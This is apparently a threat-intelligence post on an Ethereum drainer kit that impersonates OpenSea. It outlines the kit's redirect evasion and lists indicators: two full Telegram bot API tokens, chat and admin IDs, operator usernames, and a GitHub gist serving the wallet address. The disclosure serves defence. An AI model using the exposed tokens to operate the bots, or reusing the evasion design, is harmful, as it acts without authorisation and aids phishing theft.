Spotted first by @ecarlesi. ETH drainer impersonating OpenSea. The malicious actor/s could be Dutch as well as the targets, based on the drainer site's language.
This drainer kit redirects you to a different website if:
- you did not use the correct path
- you already connected previously to the website (via storage objects)
It also includes a Telegram bot to alert the malicious actor/s for real-time movements.
Telegram bot used:
5399326657:AAGOLtMLA7bMROzVUjeKDuR4GqrAblWbfXQ
username: metajsonuserrrs_bot
chat id: -709367678
title: MetaMaskActiveUsers
admin id: 2146370516
username: tanjrii
premium user
It also retrieves the same ETH wallet address from a Github gist: /gist.githubusercontent.com/ethereumjs-tx/020102e055e65567fe158f018fa226c6/raw/4171303cd239f36b6d4781d21786492de783ff9e/SIGN%2520ETH
The account was created recently:
/gist.github.com/ethereumjs-tx
The claim page has a different Telegram bot compared to the document and index.
5538424823:AAHktsHcJOuPtDnjXy0jbWgFEMu2Hwgqq48
username: cryptofinechkd_bot
chat id: -1001599540988
title: cryptoWalletsTextFiles
/t.me/+Q7M498koivAyN2Nk
tanjrii is still the creator